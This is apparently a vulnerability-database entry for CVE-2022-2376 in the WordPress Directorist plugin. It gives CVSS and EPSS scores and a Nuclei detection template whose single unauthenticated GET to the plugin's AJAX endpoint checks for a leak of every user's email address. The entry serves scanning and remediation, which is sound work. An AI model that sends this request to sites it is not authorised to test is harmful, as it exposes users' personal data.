5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
AI Score
Confidence
High
0.037 Low
EPSS
Percentile
91.8%
WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
id: CVE-2022-2376
info:
name: WordPress Directorist <7.3.1 - Information Disclosure
author: Random-Robbie
severity: medium
description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
impact: |
An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.
remediation: Fixed in version 7.3.1.
reference:
- https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
- https://nvd.nist.gov/vuln/detail/CVE-2022-2376
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2376
cwe-id: CWE-862
epss-score: 0.03672
epss-percentile: 0.91725
cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: wpwax
product: directorist
framework: wordpress
tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'directorist-authors__card__details__top'
- 'directorist-authors__card__info-list'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220018edda49fdb8c36cbd0d1f48c7207d70d31c1396c500588c20ee35c30dd6dfb0220156ff18ecef3e92a731b818edd264f58d3dc49ac42f23fed3846fa30e0a1ef98:922c64590222798bb761d5b6d8e72950
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
AI Score
Confidence
High
0.037 Low
EPSS
Percentile
91.8%